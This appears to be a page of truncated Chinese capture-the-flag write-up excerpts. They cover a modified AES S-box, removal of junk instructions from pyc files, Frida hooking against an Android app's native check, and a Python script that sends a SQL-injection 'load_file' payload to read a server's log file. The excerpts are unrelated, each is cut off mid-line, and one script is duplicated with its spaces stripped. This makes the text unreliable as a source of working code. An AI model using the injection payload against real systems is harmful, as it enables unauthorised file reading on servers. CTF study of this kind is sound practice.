得到第一处Re_1s_eaSy 第二处根据特征找到AES表 这里有个坑点 AES的SBOX被改过... 根据SBOX->invSbox: py new_s_box = [0x29,0x40,0x57,0x6E,0x85,0x9C,0xB3,0xCA,0xE1,0xF8,0x0F,0x26,0x3D,0x54,0x6B,0x82,0x99,0xB0,0xC7,0xDE,0xF5,0x0C,0x23,0x3A,0x51,0x68,0x7F,0x96,0x...
pyc 花指令,静态分析发现规律,使用下面的脚本正则匹配去花 importre r = re.compile(b'\x6e\x00\x6e\x04.{4}\x6e\x02.{2}', re.DOTALL) withopen('./RightBack.bin','rb')aspyc: code = pyc.read() ret_arr = r.findall(code) forretinret_arr: code = code.replace(ret,b'\x09\x09\...
importrequests,re importtime #题目地址 SERVER_ADDR="http://192.168.1.1:80" #自己启动docker的地址 端口默认3306 DOCKER_ADDR="8.8.8.8" defget_pin(): resp=requests.get(SERVER_ADDR+"/post/11111111%20union%20select%201,load_file('%2fhome%2fezblog%2f.pm2%2flogs%2fmain-out.log'),1/edit"...
import requests,re import time #题目地址 SERVER_ADDR = "http://192.168.1.1:80" #自己启动docker的地址 端口默认3306 DOCKER_ADDR="8.8.8.8" def get_pin(): resp = requests.get(SERVER_ADDR + "/post/11111111%20union%20select%201,load_file('%2fhome%2fezblog%2f.pm2%2flogs%2fmain-out.log...
首先用jadx打开,没有加壳 关键的就这几个地方,可以看到校验的函数是native函数,使用IDA打开so 导出函数只有JNI_onload,应该是动态注册的函数,使用frida hook 下注册的地址,之前学VMP壳的时候正好有个hook的脚本就直接拿来用了,但是hook后闪退,有frida检测,之前瞟了个一把嗦的反反frida脚本,放一起 ...